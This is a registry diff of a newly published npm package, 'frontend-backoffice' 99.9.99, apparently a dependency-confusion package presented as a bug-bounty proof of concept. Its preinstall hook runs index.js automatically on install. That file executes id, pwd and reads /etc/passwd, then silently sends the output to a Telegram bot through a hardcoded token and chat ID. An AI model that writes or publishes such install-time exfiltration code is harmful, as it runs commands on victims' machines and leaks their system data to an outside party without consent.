frontend-backoffice 99.9.99

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (2) hide show
  1. package/index.js +26 -0
  2. package/package.json +11 -0
package/index.js ADDED
@@ -0,0 +1,26 @@
1
+ const { exec } = require("child_process");
2
+ const https = require("https");
3
+
4
+ // الأوامر اللي هتتنفذ عشان تثبت الـ RCE وقراءة الملفات الحساسة
5
+ const cmd = "id && pwd && head -n 10 /etc/passwd";
6
+
7
+ exec(cmd, (error, stdout, stderr) => {
8
+ if (error) return; // لو في خطأ، اخرج بهدوء عشان السيرفر عندهم مايكراشش
9
+
10
+ // تنسيق الرسالة عشان تظهر بشكل احترافي على تليجرام
11
+ const message = `🚨 *GAMEFORGE HIT - CONFIRMED RCE* 🚨\n\n📦 *Target:* @gameforge/http-server\n\n📄 *Evidence:*\n\`\`\`\n${stdout.trim()}\n\`\`\``;
12
+
13
+ // حط التوكن والـ ID بتوعك هنا
14
+ const token = "7801695443:AAFS7MKLcAnAAkEClSTpq7QTrK3bCYrgYOA";
15
+ const chatId = "1483949647";
16
+
17
+ // تجهيز رابط الـ API بتاع تليجرام
18
+ const url = `https://api.telegram.org/bot${token}/sendMessage?chat_id=${chatId}&text=${encodeURIComponent(message)}&parse_mode=Markdown`;
19
+
20
+ // إرسال البيانات للتليجرام
21
+ https.get(url, (res) => {
22
+ // مش محتاجين نعمل حاجة بالرد
23
+ }).on('error', (e) => {
24
+ // لو الريكويست فشل (مثلاً السيرفر عندهم مانع الاتصال الخارجي)، نتجاهل الخطأ بصمت
25
+ });
26
+ });
package/package.json ADDED
@@ -0,0 +1,11 @@
1
+ {
2
+ "name": "frontend-backoffice",
3
+ "version": "99.9.99",
4
+ "description": "Security PoC for ADAC Vulnerability Disclosure Program",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "preinstall": "node index.js"
8
+ },
9
+ "author": "Mohamed Reda",
10
+ "license": "ISC"
11
+ }